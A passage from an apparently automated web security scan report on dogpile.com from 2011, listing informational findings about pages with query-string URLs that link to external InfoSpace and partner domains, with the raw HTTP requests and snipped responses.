http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/reset-fonts-grids.css/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/result_arfie.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/ws.js/_iceUrlFlag=15?_IceUrl=true
http://www.infospaceinc.com/about/
http://www.mercantila.com/

Request

GET /dogpile_other/ws/bookmark/qcat=Images/_iceUrlFlag=11?_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=ee5ee1c4c88f453ba003c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:18:10 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:58:10 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:58:10 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:58:09 GMT
Connection: close
Content-Length: 41888
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>

...[SNIP]...
</style>

<link rel="Stylesheet" type="text/css" href="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/reset-fonts-grids.css/_iceUrlFlag=15?_IceUrl=true" />
<link rel="Stylesheet" type="text/css" href="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/base-min.css/_iceUrlFlag=15?_IceUrl=true" />

<style id="icePage_DocumentStyle_DynamicStyles" type="text/css">
...[SNIP]...
</style>
<link rel="Stylesheet" type="text/css" href="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/customizations.css/_iceUrlFlag=15?_IceUrl=true" />


<link rel="icon" type="image/x-icon" href="http://ttl30d.images.infospace.com.edgesuite.net/search/images/200902/favicon.ico" />
<link rel="shortcut icon" type="image/x-icon" href="http://ttl30d.images.infospace.com.edgesuite.net/search/images/200902/favicon.ico" />
<link rel="search" type="application/opensearchdescription+xml" title="Dogpile.com" href="http://ttl30d.images.infospace.com.edgesuite.net/search/images/xml/provider.xml" />

</head>
...[SNIP]...
<a id="icePage_DPHeaderLogo_HeaderImageLink" href="http://www.dogpile.com/dogpile_other/ws/index/_iceUrlFlag=11?_IceUrl=true"><img id="icePage_DPHeaderLogo_DPLogo" title="Dogpile" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/dogpile_header_resultslogo.gif/_iceUrlFlag=15?_IceUrl=true" alt="Dogpile. All the best search engines piled into one." style="border-width:0px;" /></a>
...[SNIP]...
<a onclick="toggleAdvSearch('icePage_SearchBoxTop_AdvSearchLinkRight_AdvLnkWrapper_AdvOptionLnk');">Close <img id="icePage_SearchBoxTop_AdvSearchCloseImage" title="Close" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/btn_adv_close.gif/_iceUrlFlag=15?_IceUrl=true" alt="Close" style="border-width:0px;" /></a>
...[SNIP]...
</div>

<script type="text/javascript" src='http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-1.2.6.min.js/_iceUrlFlag=15?_IceUrl=true'></script>
<script type="text/javascript" src='http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-ui-personalized-1.5.2.min.js/_iceUrlFlag=15?_IceUrl=true'></script>
...[SNIP]...
<div id="icePage_SearchBoxBottom_ArfieImage" class="arfieImage">
               <img id="icePage_SearchBoxBottom_ArfieImageContent" Title="" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/result_arfie.gif/_iceUrlFlag=15?_IceUrl=true" alt="Arfie" style="border-width:0px;" />
           </div>
...[SNIP]...
</div>

<script type="text/javascript" language="JavaScript" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/ws.js/_iceUrlFlag=15?_IceUrl=true"></script>
...[SNIP]...
<div class="inspFooterContent" id="inspFooterContent">
<a id="icePage_DPFooter_AboutImage" href="http://www.infospaceinc.com/about/"><img id="icePage_DPFooter_imgINSP" title="Infospace..." src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/insp_logo.gif/_iceUrlFlag=15?_IceUrl=true" alt="Infospace..." style="height:19px;width:74px;border-width:0px;" /></a>
...[SNIP]...
<li>
<a id="icePage_DPFooter_About" href="http://www.infospaceinc.com/about/">About Infospace</a>
...[SNIP]...
<li>
<a id="icePage_DPFooter_MercantilaLink" href="http://www.mercantila.com/">Mercantila</a>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/SuggestClient-min.js/_iceUrlFlag=15?_IceUrl=true"></script>
...[SNIP]...

11.34. http://www.dogpile.com/dogpile_other/ws/bookmark/qcat=News/_iceUrlFlag=11 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/bookmark/qcat=News/_iceUrlFlag=11

Issue detail

The page was loaded from a URL containing a query string:

http://www.dogpile.com/dogpile_other/ws/bookmark/qcat=News/_iceUrlFlag=11?_IceUrl=true

The response contains the following links to other domains:

http://ttl30d.images.infospace.com.edgesuite.net/search/images/200902/favicon.ico
http://ttl30d.images.infospace.com.edgesuite.net/search/images/xml/provider.xml
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/SuggestClient-min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/base-min.css/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/btn_adv_close.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/customizations.css/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/dogpile_header_resultslogo.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/insp_logo.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-1.2.6.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-ui-personalized-1.5.2.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/reset-fonts-grids.css/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/result_arfie.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/ws.js/_iceUrlFlag=15?_IceUrl=true
http://www.infospaceinc.com/about/
http://www.mercantila.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=3d97c313d94145899eeac16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:18:15 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:58:15 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:58:15 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:58:15 GMT
Connection: close
Content-Length: 41872
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>

...[SNIP]...
</style>

<link rel="Stylesheet" type="text/css" href="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/reset-fonts-grids.css/_iceUrlFlag=15?_IceUrl=true" />
<link rel="Stylesheet" type="text/css" href="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/base-min.css/_iceUrlFlag=15?_IceUrl=true" />

<style id="icePage_DocumentStyle_DynamicStyles" type="text/css">
...[SNIP]...
</style>
<link rel="Stylesheet" type="text/css" href="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/customizations.css/_iceUrlFlag=15?_IceUrl=true" />


<link rel="icon" type="image/x-icon" href="http://ttl30d.images.infospace.com.edgesuite.net/search/images/200902/favicon.ico" />
<link rel="shortcut icon" type="image/x-icon" href="http://ttl30d.images.infospace.com.edgesuite.net/search/images/200902/favicon.ico" />
<link rel="search" type="application/opensearchdescription+xml" title="Dogpile.com" href="http://ttl30d.images.infospace.com.edgesuite.net/search/images/xml/provider.xml" />

</head>
...[SNIP]...
<a id="icePage_DPHeaderLogo_HeaderImageLink" href="http://www.dogpile.com/dogpile_other/ws/index/_iceUrlFlag=11?_IceUrl=true"><img id="icePage_DPHeaderLogo_DPLogo" title="Dogpile" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/dogpile_header_resultslogo.gif/_iceUrlFlag=15?_IceUrl=true" alt="Dogpile. All the best search engines piled into one." style="border-width:0px;" /></a>
...[SNIP]...
<a onclick="toggleAdvSearch('icePage_SearchBoxTop_AdvSearchLinkRight_AdvLnkWrapper_AdvOptionLnk');">Close <img id="icePage_SearchBoxTop_AdvSearchCloseImage" title="Close" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/btn_adv_close.gif/_iceUrlFlag=15?_IceUrl=true" alt="Close" style="border-width:0px;" /></a>
...[SNIP]...
</div>

<script type="text/javascript" src='http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-1.2.6.min.js/_iceUrlFlag=15?_IceUrl=true'></script>
<script type="text/javascript" src='http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-ui-personalized-1.5.2.min.js/_iceUrlFlag=15?_IceUrl=true'></script>
...[SNIP]...
<div id="icePage_SearchBoxBottom_ArfieImage" class="arfieImage">
               <img id="icePage_SearchBoxBottom_ArfieImageContent" Title="" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/result_arfie.gif/_iceUrlFlag=15?_IceUrl=true" alt="Arfie" style="border-width:0px;" />
           </div>
...[SNIP]...
</div>

<script type="text/javascript" language="JavaScript" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/ws.js/_iceUrlFlag=15?_IceUrl=true"></script>
...[SNIP]...
<div class="inspFooterContent" id="inspFooterContent">
<a id="icePage_DPFooter_AboutImage" href="http://www.infospaceinc.com/about/"><img id="icePage_DPFooter_imgINSP" title="Infospace..." src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/insp_logo.gif/_iceUrlFlag=15?_IceUrl=true" alt="Infospace..." style="height:19px;width:74px;border-width:0px;" /></a>
...[SNIP]...
<li>
<a id="icePage_DPFooter_About" href="http://www.infospaceinc.com/about/">About Infospace</a>
...[SNIP]...
<li>
<a id="icePage_DPFooter_MercantilaLink" href="http://www.mercantila.com/">Mercantila</a>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/SuggestClient-min.js/_iceUrlFlag=15?_IceUrl=true"></script>
...[SNIP]...

11.35. http://www.dogpile.com/dogpile_other/ws/bookmark/qcat=Video/_iceUrlFlag=11 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/bookmark/qcat=Video/_iceUrlFlag=11

Issue detail

The page was loaded from a URL containing a query string:

http://www.dogpile.com/dogpile_other/ws/bookmark/qcat=Video/_iceUrlFlag=11?_IceUrl=true

The response contains the following links to other domains:

http://ttl30d.images.infospace.com.edgesuite.net/search/images/200902/favicon.ico
http://ttl30d.images.infospace.com.edgesuite.net/search/images/xml/provider.xml
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/SuggestClient-min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/base-min.css/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/btn_adv_close.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/customizations.css/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/dogpile_header_resultslogo.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/insp_logo.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-1.2.6.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-ui-personalized-1.5.2.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/reset-fonts-grids.css/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/result_arfie.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/ws.js/_iceUrlFlag=15?_IceUrl=true
http://www.infospaceinc.com/about/
http://www.mercantila.com/

Request

GET /dogpile_other/ws/bookmark/qcat=Video/_iceUrlFlag=11?_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=1d17aadcedc744199980c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:18:12 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:58:12 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:58:12 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:58:12 GMT
Connection: close
Content-Length: 41884
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>

...[SNIP]...
</style>

<link rel="Stylesheet" type="text/css" href="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/reset-fonts-grids.css/_iceUrlFlag=15?_IceUrl=true" />
<link rel="Stylesheet" type="text/css" href="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/base-min.css/_iceUrlFlag=15?_IceUrl=true" />

<style id="icePage_DocumentStyle_DynamicStyles" type="text/css">
...[SNIP]...
</style>
<link rel="Stylesheet" type="text/css" href="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/customizations.css/_iceUrlFlag=15?_IceUrl=true" />


<link rel="icon" type="image/x-icon" href="http://ttl30d.images.infospace.com.edgesuite.net/search/images/200902/favicon.ico" />
<link rel="shortcut icon" type="image/x-icon" href="http://ttl30d.images.infospace.com.edgesuite.net/search/images/200902/favicon.ico" />
<link rel="search" type="application/opensearchdescription+xml" title="Dogpile.com" href="http://ttl30d.images.infospace.com.edgesuite.net/search/images/xml/provider.xml" />

</head>
...[SNIP]...
<a id="icePage_DPHeaderLogo_HeaderImageLink" href="http://www.dogpile.com/dogpile_other/ws/index/_iceUrlFlag=11?_IceUrl=true"><img id="icePage_DPHeaderLogo_DPLogo" title="Dogpile" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/dogpile_header_resultslogo.gif/_iceUrlFlag=15?_IceUrl=true" alt="Dogpile. All the best search engines piled into one." style="border-width:0px;" /></a>
...[SNIP]...
<a onclick="toggleAdvSearch('icePage_SearchBoxTop_AdvSearchLinkRight_AdvLnkWrapper_AdvOptionLnk');">Close <img id="icePage_SearchBoxTop_AdvSearchCloseImage" title="Close" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/btn_adv_close.gif/_iceUrlFlag=15?_IceUrl=true" alt="Close" style="border-width:0px;" /></a>
...[SNIP]...
</div>

<script type="text/javascript" src='http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-1.2.6.min.js/_iceUrlFlag=15?_IceUrl=true'></script>
<script type="text/javascript" src='http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-ui-personalized-1.5.2.min.js/_iceUrlFlag=15?_IceUrl=true'></script>
...[SNIP]...
<div id="icePage_SearchBoxBottom_ArfieImage" class="arfieImage">
               <img id="icePage_SearchBoxBottom_ArfieImageContent" Title="" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/result_arfie.gif/_iceUrlFlag=15?_IceUrl=true" alt="Arfie" style="border-width:0px;" />
           </div>
...[SNIP]...
</div>

<script type="text/javascript" language="JavaScript" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/ws.js/_iceUrlFlag=15?_IceUrl=true"></script>
...[SNIP]...
<div class="inspFooterContent" id="inspFooterContent">
<a id="icePage_DPFooter_AboutImage" href="http://www.infospaceinc.com/about/"><img id="icePage_DPFooter_imgINSP" title="Infospace..." src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/insp_logo.gif/_iceUrlFlag=15?_IceUrl=true" alt="Infospace..." style="height:19px;width:74px;border-width:0px;" /></a>
...[SNIP]...
<li>
<a id="icePage_DPFooter_About" href="http://www.infospaceinc.com/about/">About Infospace</a>
...[SNIP]...
<li>
<a id="icePage_DPFooter_MercantilaLink" href="http://www.mercantila.com/">Mercantila</a>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/SuggestClient-min.js/_iceUrlFlag=15?_IceUrl=true"></script>
...[SNIP]...

11.36. http://www.dogpile.com/dogpile_other/ws/bookmark/qcat=Web/_iceUrlFlag=11 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/bookmark/qcat=Web/_iceUrlFlag=11

Issue detail

The page was loaded from a URL containing a query string:

http://www.dogpile.com/dogpile_other/ws/bookmark/qcat=Web/_iceUrlFlag=11?_IceUrl=true

The response contains the following links to other domains:

http://ttl30d.images.infospace.com.edgesuite.net/search/images/200902/favicon.ico
http://ttl30d.images.infospace.com.edgesuite.net/search/images/xml/provider.xml
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/SuggestClient-min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/base-min.css/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/btn_adv_close.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/customizations.css/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/dogpile_header_resultslogo.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/insp_logo.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-1.2.6.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-ui-personalized-1.5.2.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/partner_logos.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/reset-fonts-grids.css/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/result_arfie.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/ws.js/_iceUrlFlag=15?_IceUrl=true
http://www.infospaceinc.com/about/
http://www.mercantila.com/

Request

GET /dogpile_other/ws/bookmark/qcat=Web/_iceUrlFlag=11?_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=c74d9c8cc8324bd1953dc16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:18:08 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:58:08 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:58:08 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:58:07 GMT
Connection: close
Content-Length: 42209
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>

...[SNIP]...
</style>

<link rel="Stylesheet" type="text/css" href="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/reset-fonts-grids.css/_iceUrlFlag=15?_IceUrl=true" />
<link rel="Stylesheet" type="text/css" href="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/base-min.css/_iceUrlFlag=15?_IceUrl=true" />

<style id="icePage_DocumentStyle_DynamicStyles" type="text/css">
...[SNIP]...
</style>
<link rel="Stylesheet" type="text/css" href="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/customizations.css/_iceUrlFlag=15?_IceUrl=true" />


<link rel="icon" type="image/x-icon" href="http://ttl30d.images.infospace.com.edgesuite.net/search/images/200902/favicon.ico" />
<link rel="shortcut icon" type="image/x-icon" href="http://ttl30d.images.infospace.com.edgesuite.net/search/images/200902/favicon.ico" />
<link rel="search" type="application/opensearchdescription+xml" title="Dogpile.com" href="http://ttl30d.images.infospace.com.edgesuite.net/search/images/xml/provider.xml" />

</head>
...[SNIP]...
<a id="icePage_DPHeaderLogo_HeaderImageLink" href="http://www.dogpile.com/dogpile_other/ws/index/_iceUrlFlag=11?_IceUrl=true"><img id="icePage_DPHeaderLogo_DPLogo" title="Dogpile" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/dogpile_header_resultslogo.gif/_iceUrlFlag=15?_IceUrl=true" alt="Dogpile. All the best search engines piled into one." style="border-width:0px;" /></a>
...[SNIP]...
<div id="icePage_SearchBoxTop_ctl02" class="sbattrib">
<img id="icePage_SearchBoxTop_sbattribution" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/partner_logos.gif/_iceUrlFlag=15?_IceUrl=true" alt="Search Providers" style="border-width:0px;" />
</div>
...[SNIP]...
<a onclick="toggleAdvSearch('icePage_SearchBoxTop_AdvSearchLinkRight_AdvLnkWrapper_AdvOptionLnk');">Close <img id="icePage_SearchBoxTop_AdvSearchCloseImage" title="Close" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/btn_adv_close.gif/_iceUrlFlag=15?_IceUrl=true" alt="Close" style="border-width:0px;" /></a>
...[SNIP]...
</div>

<script type="text/javascript" src='http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-1.2.6.min.js/_iceUrlFlag=15?_IceUrl=true'></script>
<script type="text/javascript" src='http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-ui-personalized-1.5.2.min.js/_iceUrlFlag=15?_IceUrl=true'></script>
...[SNIP]...
<div id="icePage_SearchBoxBottom_ArfieImage" class="arfieImage">
               <img id="icePage_SearchBoxBottom_ArfieImageContent" Title="" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/result_arfie.gif/_iceUrlFlag=15?_IceUrl=true" alt="Arfie" style="border-width:0px;" />
           </div>
...[SNIP]...
</div>

<script type="text/javascript" language="JavaScript" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/ws.js/_iceUrlFlag=15?_IceUrl=true"></script>
...[SNIP]...
<div class="inspFooterContent" id="inspFooterContent">
<a id="icePage_DPFooter_AboutImage" href="http://www.infospaceinc.com/about/"><img id="icePage_DPFooter_imgINSP" title="Infospace..." src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/insp_logo.gif/_iceUrlFlag=15?_IceUrl=true" alt="Infospace..." style="height:19px;width:74px;border-width:0px;" /></a>
...[SNIP]...
<li>
<a id="icePage_DPFooter_About" href="http://www.infospaceinc.com/about/">About Infospace</a>
...[SNIP]...
<li>
<a id="icePage_DPFooter_MercantilaLink" href="http://www.mercantila.com/">Mercantila</a>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/SuggestClient-min.js/_iceUrlFlag=15?_IceUrl=true"></script>
...[SNIP]...

11.37. http://www.dogpile.com/dogpile_other/ws/bookmark/rfcid=1211/_iceUrlFlag=11 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/bookmark/rfcid=1211/_iceUrlFlag=11

Issue detail

The page was loaded from a URL containing a query string:

http://www.dogpile.com/dogpile_other/ws/bookmark/rfcid=1211/_iceUrlFlag=11?_IceUrl=true

The response contains the following links to other domains:

http://ttl30d.images.infospace.com.edgesuite.net/search/images/200902/favicon.ico
http://ttl30d.images.infospace.com.edgesuite.net/search/images/xml/provider.xml
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/SuggestClient-min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/base-min.css/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/btn_adv_close.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/customizations.css/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/dogpile_header_resultslogo.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/insp_logo.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-1.2.6.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-ui-personalized-1.5.2.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/partner_logos.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/reset-fonts-grids.css/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/result_arfie.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/ws.js/_iceUrlFlag=15?_IceUrl=true
